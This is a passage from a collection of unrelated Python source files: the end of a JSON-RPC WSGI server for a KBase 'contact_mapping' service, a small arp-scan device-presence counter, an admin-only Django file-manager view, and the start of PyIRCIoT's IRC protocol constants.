'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'contact_mapping'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_contact_mapping.run_contact_mapping,
name='contact_mapping.run_contact_mapping',
types=[dict])
self.method_authentication['contact_mapping.run_contact_mapping'] = 'required' # noqa
self.rpc_service.add(impl_contact_mapping.status,
name='contact_mapping.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'contact_mapping ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
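# Usage sketch (illustrative only): running the server in a child process so
# it can be stopped again, e.g. from a test:
#
#   port = start_server(newprocess=True)   # OS-assigned port is returned
#   # ... POST JSON-RPC requests to http://localhost:<port>/ ...
#   stop_server()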
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
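# Illustrative only: process_async_cli() expects a JSON-RPC request on disk
# (method names must match those registered with rpc_service.add above), e.g.
# an input file containing
#
#   {"method": "contact_mapping.status", "params": [], "id": "1"}
#
# It fills in missing "version"/"id" fields, writes the JSON-RPC response to
# the output path, and returns exit code 500 if the response carries an error.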
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
scanner.py
|
import subprocess
import re
from time import sleep
from threading import Thread
#pattern = re.compile(r'([0-9a-fA-F]{2}\:){5}[0-9a-fA-F]{2}')
pattern = re.compile(r'[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}\:[0-9a-fA-F]{2}')
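# Illustrative only: with no capturing groups in the pattern, findall()
# returns the full MAC addresses found in arp-scan style output, e.g.
#
#   pattern.findall("192.168.1.10  a4:5e:60:c2:11:22  ExampleVendor")
#   # -> ['a4:5e:60:c2:11:22']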
# Function that checks for device presence
def check():
# 10 second pause to allow main thread to finish arp-scan and populate output
sleep(10)
# Loop through checking for devices and counting if they're not present
while True:
# Exit the thread if a keyboard interrupt occurred in the main thread
if stop:
print("Exiting Thread")
exit()
mac_addressess = re.findall(pattern, output)
print(mac_addressess)
devices = len(mac_addressess) - 2
print(str(devices) + " devices connected")
sleep(10)
# Main thread
try:
# Initialize a variable to trigger threads to exit when True
global stop
stop = False
# Start the thread(s)
# It will start as many threads as there are values in the occupant array
t = Thread(target=check)
t.start()
while True:
# Make output global so the threads can see it
global output
# Assign list of devices on the network to "output"
output = subprocess.getoutput("sudo arp-scan -l")
# Wait 10 seconds between scans
sleep(10)
except KeyboardInterrupt:
# On a keyboard interrupt signal threads to exit
stop = True
exit()
|
views.py
|
import os
import shutil
from datetime import datetime
from os import path, listdir, makedirs
from threading import Thread
import requests
from django.conf import settings
from django.contrib import messages
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.core.exceptions import PermissionDenied
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.urls import reverse
from django.views.generic import TemplateView
from account.permissions import is_admin_or_root
from utils import random_string
from utils.upload import save_uploaded_file_to
class FileManager(UserPassesTestMixin, TemplateView):
template_name = 'filemanager.jinja2'
@staticmethod
def slugify(text):
import re
return re.sub(r'[ /"#!:]+', '_', text)
def dispatch(self, request, *args, **kwargs):
makedirs(settings.MIRROR_DIR, exist_ok=True)
self.position = request.POST.get('q', request.GET.get('q', ''))
self.root = path.join(settings.MIRROR_DIR, self.position)
return super().dispatch(request, *args, **kwargs)
def test_func(self):
if not is_admin_or_root(self.request.user):
return False
if path.commonpath([self.root, settings.MIRROR_DIR]) != settings.MIRROR_DIR:
return False
return True
def get_context_data(self, **kwargs):
display_dir = self.position + '/'
if '/' not in self.position:
parent_link = ''
else:
parent_link = self.position[0:self.position.rfind('/')]
file_list = []
if not path.isdir(self.root):
file_list = []
messages.add_message(self.request, messages.WARNING, "Directory '%s' does not exist." % display_dir)
else:
for file in listdir(self.root):
file_path = path.join(self.root, file)
file_pos = path.join(self.position, file)
if path.isdir(file_path):
size = '--'
link = reverse('filemanager:index') + '?q=%s' % file_pos
is_dir = True
else:
size = "%d" % path.getsize(file_path)
link = '/upload/mirror/' + file_pos
is_dir = False
file_list.append(dict(name=file, modified=datetime.fromtimestamp(path.getmtime(file_path)).
strftime(settings.DATETIME_FORMAT_TEMPLATE), size=size, link=link, is_dir=is_dir))
return {
'file_list': file_list,
'display_dir': display_dir,
'position': self.position,
'parent_link': parent_link
}
def handle_upload(self, request):
file = request.FILES['file']
save_uploaded_file_to(file, self.root, filename=self.slugify(file.name))
def handle_download(self, request):
def download_file(url, to):
local_filename = url.split('/')[-1]
if local_filename == '':
local_filename = random_string()
r = requests.get(url, stream=True, timeout=30)
with open(path.join(to, local_filename), 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk:
f.write(chunk)
url = request.POST['url']
Thread(target=download_file, args=(url, self.root)).start()
def handle_rename(self, request):
new_path = path.join(self.root, self.slugify(request.POST['name']))
old_path = path.join(self.root, request.POST['oldName'].replace('/', '_'))
os.rename(old_path, new_path)
def handle_delete(self, request):
file_path = path.join(self.root, request.POST['name'].replace('/', '_'))
if path.isfile(file_path):
os.remove(file_path)
else:
shutil.rmtree(file_path)
def handle_create_new_dir(self, request):
file_path = path.join(self.root, request.POST['name'].replace('/', '_'))
print(file_path)
os.makedirs(file_path, exist_ok=True)
def post(self, request, *args, **kwargs):
t = 'upload'
try:
t = request.POST['type']
if t == 'upload':
self.handle_upload(request)
elif t == 'download':
self.handle_download(request)
elif t == 'rename':
self.handle_rename(request)
elif t == 'delete':
self.handle_delete(request)
elif t == 'createdir':
self.handle_create_new_dir(request)
else:
raise NotImplementedError("Unrecognized query type")
except Exception as e:
messages.add_message(request, messages.ERROR, repr(e))
if t in ['upload', 'download']:
return redirect(reverse('filemanager:index') + '?q=%s' % self.position)
else:
return HttpResponse()
|
rfc1459.py
|
'''
'' PyIRCIoT (PyLayerIRC class)
''
'' Copyright (c) 2018-2020 Alexey Y. Woronov
''
'' By using this file, you agree to the terms and conditions set
'' forth in the LICENSE file which can be found at the top level
'' of this package
''
'' Authors:
'' Alexey Y. Woronov <alexey@woronov.ru>
'''
# Those Global options override default behavior and memory usage
#
DO_debug_library = False
DO_default_draft = "ircu" # Integrator must define IRC software
import socket
import select
import random
import re
import threading
import ssl
try:
import json
except:
import simplejson as json
from queue import Queue
from time import sleep
try: # insecure, but for development
from irciot_shared import *
except:
from PyIRCIoT.irciot_shared import *
if DO_debug_library:
from pprint import pprint
import datetime
class PyLayerIRC( irciot_shared_ ):
class CONST( irciot_shared_.CONST ):
#
irciot_protocol_version = '0.3.33'
#
irciot_library_version = '0.0.229'
#
# Bot specific constants
#
irc_first_wait = 28
irc_micro_wait = 0.12
irc_ident_wait = 8
irc_default_wait = 28
irc_latency_wait = 1
#
irc_default_debug = DO_debug_library
#
irc_default_nick = "MyBot"
irc_default_info = "IRC-IoT Bot"
irc_default_quit = "Bye!"
#
irc_default_server = "irc-iot.nsk.ru"
irc_default_port = 6667
irc_default_ssl_port = 6697
irc_default_password = None
irc_default_ssl = False
irc_default_ident = False
#
irc_default_proxy = None
irc_default_proxy_server = None
irc_default_proxy_port = None
irc_default_proxy_password = None
#
# Will be replaced to channel-list:
irc_default_channel = "#myhome"
irc_default_chankey = None
#
irc_default_silence = 8 # count of irc_default_wait
#
# User options:
irc_aop = 101 # give (+o) him channel operator status
irc_aban = 102 # ban (+b) him on these channels
irc_avo = 103 # give (+v) him a voice on channels
irc_akick = 130 # kick it from these channels
irc_adeop = 131 # take away (-o) his channel operator status
irc_unban = 132 # unban (-b) mask on channels when banned
irc_adevo = 133 # take away (-v) his voice on channels
#
# 0. Unique User ID
# 1. IRC User Mask
# 2. IRC Channel Name
# 3. User Options
# 4. Encryption Private or Secret Key
# 5. Blockchain Private Key
# 6. Last Message ID
# 7. Encryption Key Timeout
# 8. Blockchain Key Timeout
# 9. My last Message ID
#
# Default Message ID pipeline size:
irc_default_mid_pipeline_size = 16
#
irc_default_users = [
( 1, "iotBot!*irc@irc-iot.nsk.ru", irc_default_channel,
None, None, None, None, None, None, None ),
( 2, "FaceBot!*irc@faceserv*.nsk.ru", irc_default_channel,
irc_aop, None, None, None, None, None, None ),
( 3, "noobot!*bot@irc-iot.nsk.ru", irc_default_channel,
[ irc_aop, irc_unban ], None, None, None, None, None, None ) ]
#
irc_default_talk_with_strangers = False
#
irc_queue_input = 0
irc_queue_output = 1
#
irc_recon_steps = 8
#
irc_input_buffer = ""
#
irc_buffer_size = 3072
#
irc_mode_CLIENT = "CLIENT"
# ^ Connects to IRC server over the network as an IRC client
irc_mode_SERVICE = "SERVICE"
# ^ Connects to IRC server over the network as an IRC service
irc_mode_SERVER = "SERVER"
# ^ Act as an IRC server, accepting connections of IRC clients
irc_layer_modes = [
irc_mode_CLIENT,
irc_mode_SERVICE,
irc_mode_SERVER ]
irc_default_mode = irc_mode_CLIENT
#
irc_default_nick_retry = 3600 # in seconds
irc_default_join_retry = 32 # tries
irc_default_nick_pause = 16 # tries
#
irc_default_network_tag = "IRC-IoT"
#
# According RFC 1459
#
irc_ascii_lowercase = "abcdefghijklmnopqrstuvwxyz"
irc_ascii_uppercase = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
irc_ascii_letters = irc_ascii_lowercase + irc_ascii_uppercase
irc_ascii_digits = "0123456789"
irc_special_chars = "-[]\\`^{}"
irc_nick_first_char = irc_ascii_letters + "[]\\`^{}"
irc_nick_chars = irc_ascii_letters \
+ irc_ascii_digits + irc_special_chars
irc_translation = "".maketrans( \
irc_ascii_uppercase + "[]\\^",
irc_ascii_lowercase + "{}|~")
irc_transmocker = "".maketrans( \
"aAoOBEGgIlSsT-_05891",
"4400836911557_-OSBgl" )
irc_mode_add = "+"
irc_mode_del = "-"
irc_change_modes \
= irc_mode_add \
+ irc_mode_del
irc_umode_op = "o"
irc_umode_voice = "v"
irc_umode_ban = "b"
irc_user_modes \
= irc_umode_op \
+ irc_umode_voice\
+ irc_umode_ban
irc_channel_modes = "psitnm"
irc_extra_modes = "lk"
irc_all_modes \
= irc_user_modes \
+ irc_channel_modes \
+ irc_extra_modes
irc_all_modes_chars \
= irc_change_modes \
+ irc_all_modes
#
irc_nick_regexp = "^[" + irc_ascii_letters \
+ "_`\^\\\[\]\{\}][" + irc_ascii_letters \
+ irc_ascii_digits + "\-_`\^\\\[\]\{\}]{1,12}$"
irc_channel_regexp = "^#[" + irc_ascii_letters \
+ irc_ascii_digits + "\-_\^\[\]\{\}]{1,24}$"
#
irc_default_encoding = irciot_shared_.CONST.enc_UTF8
irc_fallback_encoding = irciot_shared_.CONST.enc_ISO1
#
irc_default_draft = DO_default_draft
irc_additional_drafts = []
#
# 1. "RFC1459" Internet Relay Chat Protocol '1993
# 2. "RFC2812" IRC Draft: Client Protocol '2000
# 3. "asp" -- AspIRCd (Charybdis fork) '2019
# 4. "Bahamut" -- Bahamut, @ DALnet, ver. 2.1.6, '1999-2020
# 5. "beware" -- beware ircd, Delphi based, ver. 2.2.0
# 6. "Charybdis" -- charybdis-ircd, ver. 3.5.0, '2007-2020
# 7. "ConfRoom" -- Conference Room, ver. 1.7.6, '2014
# 8. "discord" -- discordIRCd, js based, ver. 0.5.0 '2018
# 9. "Elemental" -- Elemental-IRCd, ver. 6.6.2, '2016
# 10. "Ergo" -- Ergo (was Oragono), Golang based, ver. 2.8.0, '2012-2021
# 11. "hybrid" -- ircd-hybrid, @ EFNet, ver. 8.2.29
# 12. "Insp" -- Inspircd, ver. 2.0.20, '2015
# 13. "IRCNet" -- IRCNet ircd, @ IRCNet, ver. 2.12.2
# 14. "IRCPlus" -- IRCPlus, for Windows, ver. 5.0, '2001
# 15. "ircu" -- ircd-ircu aka Undernet IRCd, ver. 2.10.12.18
# 16. "Kine" -- KineIRCd, C++, '2002-2005
# 17. "miniircd" -- miniircd, Python based, ver. 1.3, '2003
# 18. "Nefarious" -- Nefarious ircd
# 19. "Nefarious2" -- Nefarious IRCu (ircu fork), ver. 2.0-288, '2020
# 20. "ng" -- ngIRCd aka Next Generation IRCd, ver. 25, '2019
# 21. "plexus" -- PleXusIRCd, C++, '2003-2006
# 22. "pircd" -- Perl IRCd, Perl based, '2002
# 23. "Provision" -- ProvisionIRCd, Python based, '2006
# 24. "pure" -- pureIRCd, CSharp based, '2008
# 25. "Rabbit" -- RabbitIRCD, (UnrealIRCd fork), @ Wheresource '2014
# 26. "ratbox" -- ircd-ratbox, @ EFNet, ver. 3.0.8, '2006
# 27. "Rock" -- rock-ircd aka RockIRCd (UnrealIRCd fork), '2009
# 28. "Rubi" -- RubiIRCd, Ruby based '2009
# 29. "RusNet" -- ircd RusNet, @ RusNet, ver. 1.4.25, '2011
# 30. "seven" -- ircd-seven, ver. 1.1.3, '2007-2019
# 31. "Shadow" -- ShadowIRCd, ver. 6.3.3, '2003
# 32. "snircd" -- snircd (ircu fork), @ QuakeNet, ver. 1.3.4
# 33. "solid" -- solid-ircd (Bahamut fork), ver. 3.4.8, '2004-2013
# 34. "Synchronet" -- Synchronet IRCd, js based, ver. 3.11, '2010-2019
# 35. "Unreal" -- UnrealIRCd, ver. 5.0.9, '1999-2021
# 36. "We" -- WeIRCd, ver. 0.8.2, '2010
# 37. "PyIRCIoT" (when it works in IRC server mode)
#
# Additional drafts extending the Internet Relay Chat protocol:
irc_add_plus = "IRC+" # IRC+ Services Protocol
irc_add_v3 = "IRCv3" # Specification 3.2 built on top of the IRC protocol
#
irc_max_nick_length = 15
if irc_default_draft == "ircu":
irc_max_nick_length = 12
irc_max_topic_length = 160
irc_max_network_name_length = 80
#
ircd_Ch_se = [ "Charybdis", "seven" ]
ircd_Ch_se_ra = ircd_Ch_se + [ "ratbox" ]
ircd_Ch_se_ra_pl = ircd_Ch_se_ra + [ "plexus" ]
ircd_Un_Ch_se = [ "Unreal", "Charybdis", "seven" ]
ircd_Un_Ba = [ "Unreal", "Bahamut" ]
ircd_iu_Un_Ba = ircd_Un_Ba + [ "ircu" ]
ircd_iu_sn = [ "ircu", "snircd" ]
ircd_iu_Un_sn = ircd_iu_sn + [ "Unreal" ]
ircd_iu_Un_Ba_sn = ircd_iu_Un_sn + [ "Bahamut" ]
#
if irc_default_draft in ircd_Un_Ch_se:
irc_additional_drafts += [ irc_add_v3 ]
#
irc_default_MTU = 480
if irc_default_draft == "ircu":
irc_default_MTU = 440
if irc_add_v3 in irc_additional_drafts:
#irc_default_MTU = 1024 (line-length-3.3)
pass
#
RPL_WELCOME = "001"
RPL_YOURHOST = "002"
RPL_CREATED = "003"
RPL_MYINFO = "004"
if irc_default_draft == "RFC2812":
RPL_BOUNCE = "005"
else:
RPL_ISUPPORT = "005"
if irc_default_draft == "Unreal":
RPL_MAP = "006"
RPL_MAPEND = "007"
if irc_default_draft == "ircu":
RPL_SNOMASK = "008"
RPL_STATMEMTOT = "009"
RPL_STATMEM = "010"
if irc_default_draft in [ "Unreal", "Charybdis", "hybrid", \
"seven", "IRCNet", "plexus", "ratbox" ]:
RPL_REDIR = "010"
if irc_default_draft == "ircu":
RPL_MAP = "015"
RPL_MAPMORE = "016"
RPL_MAPEND = "017"
if irc_default_draft == "IRCNet":
RPL_MAPSTART = "018"
RPL_HELLO = "020"
if irc_default_draft in ircd_iu_sn:
RPL_APASSWARN_SET = "030"
RPL_APASSWARN_SECRET = "031"
RPL_APASSWARN_CLEAR = "032"
if irc_default_draft == "Unreal":
RPL_YOURID = "042"
ERR_REMOTEISUPPORT = "105"
RPL_TRACELINK = "200"
RPL_TRACECONNECTING = "201"
RPL_TRACEHANDSHAKE = "202"
RPL_TRACEUNKNOWN = "203"
RPL_TRACEOPERATOR = "204"
RPL_TRACEUSER = "205"
RPL_TRACESERVER = "206"
if irc_default_draft == "plexus":
RPL_TRACECAPTURED = "207"
else:
RPL_TRACESERVICE = "207"
RPL_TRACENEWTYPE = "208"
RPL_TRACECLASS = "209"
if irc_default_draft == "Unreal":
RPL_STATSHELP = "210"
if irc_default_draft == "IRCNet":
RPL_TRACERECONNECT = "210"
RPL_STATSLINKINFO = "211"
RPL_STATSCOMMANDS = "212"
RPL_STATSCLINE = "213"
RPL_STATSOLDNLINE = "214"
RPL_STATSILINE = "215"
RPL_STATSKLINE = "216"
if irc_default_draft in ircd_iu_sn:
RPL_STATSPLINE = "217"
else:
RPL_STATSQLINE = "217"
RPL_STATSYLINE = "218"
RPL_ENDOFSTATS = "219"
if irc_default_draft == "Unreal":
RPL_STATSBLINE = "220"
else:
RPL_STATSWLINE = "220"
RPL_UMODEIS = "221"
if irc_default_draft in ircd_iu_sn:
RPL_STATSJLINE = "222"
if irc_default_draft == "Unreal":
RPL_SQLINE_NICK = "222"
if irc_default_draft == "Bahamut":
RPL_STATSELINE = "223"
if irc_default_draft == "Unreal":
RPL_STATSGLINE = "223"
RPL_STATSTLINE = "224"
if irc_default_draft == "Bahamut":
RPL_STATSCLONE = "225"
RPL_STATSCOUNT = "226"
if irc_default_draft in [ "ircu", "hybrid", "plexus", "snircd" ]:
RPL_STATALINE = "226"
if irc_default_draft == "Unreal":
RPL_STATSELINE = "225"
RPL_STATSNLINE = "226"
RPL_STATSVLINE = "227"
RPL_STATSBANVER = "228"
RPL_SERVICEINFO = "231"
RPL_ENDOFSERVICES = "232"
RPL_SERVICE = "233"
RPL_SERVLIST = "234"
RPL_SERVLISTEND = "235"
if irc_default_draft == "IRCNet":
RPL_STATSIAUTH = "239"
elif irc_default_draft == "RFC2812":
RPL_STATSVLINE = "240"
RPL_STATSLLINE = "241"
RPL_STATSUPTIME = "242"
RPL_STATSOLINE = "243"
if irc_default_draft == "RFC2812":
RPL_STATSSLINE = "244"
else:
RPL_STATSHLINE = "244"
if irc_default_draft in [ "Unreal", "Bahamut", "Charybdis", \
"IRCNet", "plexus", "seven", "ratbox" ]:
RPL_STATSSLINE = "245"
if irc_default_draft == "ircu":
RPL_STATSTLINE = "246"
RPL_STATSGLINE = "247"
if irc_default_draft == "Unreal":
RPL_STATSXLINE = "247"
if irc_default_draft == "ircu":
RPL_STATSULINE = "248"
RPL_STATSDEBUG = "249" # Unknown
RPL_LUSERCONNS = "250" # '1998
RPL_LUSERCLIENT = "251"
RPL_LUSEROP = "252"
RPL_LUSERUNKNOWN = "253"
RPL_LUSERCHANNELS = "254"
RPL_LUSERME = "255"
RPL_ADMINME = "256"
RPL_ADMINLOC1 = "257"
RPL_ADMINLOC2 = "258"
RPL_ADMINEMAIL = "259"
RPL_TRACELOG = "261"
RPL_ENDOFTRACE = "262" # '1997
if irc_default_draft in [ "RFC2812", "IRCNet" ]:
RPL_TRYAGAIN = "263"
else:
RPL_LOAD2HI = "263"
RPL_N_LOCAL = "265" # '1997
RPL_N_GLOBAL = "266" # '1997
if irc_default_draft in ircd_iu_Un_Ba_sn:
RPL_SILELIST = "271"
RPL_ENDOFSILELIST = "272"
if irc_default_draft in ircd_iu_Un_sn:
RPL_STATUSDLINE = "275"
if irc_default_draft == "Bahamut":
RPL_USIGNSSL = "275"
if irc_default_draft in [ "Charybdis", "seven", "hybrid", "plexus" ]:
RPL_WHOISCERTFP = "276"
if irc_default_draft in ircd_iu_sn:
RPL_STATSRLINE = "276"
RPL_GLIST = "280"
RPL_ENDOFGLIST = "281"
if irc_default_draft == "Unreal":
RPL_HELPHDR = "290"
RPL_HELPOP = "291"
RPL_HELPTLR = "292"
RPL_HELPHLP = "293"
RPL_HELPFWD = "294"
RPL_HELPIGN = "295"
if irc_default_draft == "snircd":
RPL_DATASTR = "290"
RPL_ENDOFCHECK = "291"
RPL_NONE = "300" # Unused?
RPL_AWAY = "301"
RPL_USERHOST = "302"
RPL_ISON = "303"
RPL_TEXT = "304"
RPL_UNAWAY = "305"
RPL_NOAWAY = "306"
if irc_default_draft == "ircu":
RPL_USERIP = "307"
if irc_default_draft in [ "Bahamut", "hybrid" ]:
RPL_WHOISADMIN = "308"
if irc_default_draft == "Unreal":
RPL_RULESSTART = "308"
RPL_ENDOFRULES = "309"
if irc_default_draft == "Bahamut":
RPL_WHOISSADMIN = "309"
if irc_default_draft == "Unreal":
RPL_WHOISHELPOP = "310"
elif irc_default_draft == "Bahamut":
RPL_WHOISSVCMSG = "310"
elif irc_default_draft in [ "hybrid", "plexus" ]:
RPL_WHOISMODES = "310"
else:
RPL_WHOISHELP = "310" # Unknown
RPL_WHOISUSER = "311"
RPL_WHOISSERVER = "312"
RPL_WHOISOPERATOR = "313"
RPL_WHOWASUSER = "314"
RPL_ENDOFWHO = "315"
RPL_WHOISCHANOP = "316"
RPL_WHOISIDLE = "317"
RPL_ENDOFWHOIS = "318"
RPL_WHOISCHANNELS = "319"
RPL_WHOISWORLD = "320" # Unknown
RPL_LISTSTART = "321"
RPL_LIST = "322"
RPL_LISTEND = "323"
RPL_CHANNELMODEIS = "324"
if irc_default_draft in ircd_Ch_se:
RPL_CHANNELMLOCK = "325"
RPL_CHANNELURL = "328"
else:
RPL_UNIQOPIS = "325" # Unknown
if irc_default_draft == "Insp":
RPL_CHANNELCREATED = "329"
if irc_default_draft == "Insp":
RPL_NOTOPICSET = "331"
else:
RPL_NOTOPIC = "331"
RPL_CURRENTTOPIC = "332"
RPL_TOPICINFO = "333"
if irc_default_draft in ircd_iu_sn:
RPL_LISTUSAGE = "334"
if irc_default_draft in ircd_Un_Ba:
RPL_COMMANDSYNTAX = "334"
if irc_default_draft == "Unreal":
RPL_LISTSYNTAX = "334"
RPL_WHOISBOT = "335"
if irc_default_draft in [ "Bahamut", "Charybdis", \
"hybrid", "seven" ]:
RPL_WHOISTEXT = "337"
RPL_WHOISACTUALLY = "338"
if irc_default_draft in ircd_iu_Un_sn:
